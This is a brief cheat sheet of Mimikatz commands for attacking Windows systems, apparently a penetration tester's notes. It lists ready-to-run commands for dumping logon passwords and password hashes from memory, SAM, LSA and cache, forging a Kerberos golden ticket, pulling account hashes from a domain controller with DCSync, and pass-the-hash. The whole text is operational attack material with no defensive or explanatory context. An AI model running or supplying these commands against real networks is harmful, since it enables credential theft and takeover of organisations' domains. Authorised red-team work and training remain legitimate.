Mimikatz
Steal credentials
- privilege::debug
- sekurlsa::logonpasswords
Dump Hashes
- token::elevate
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Create a golden ticket on the domain controller (DC)
- privilege::debug
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:
Pass the Hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd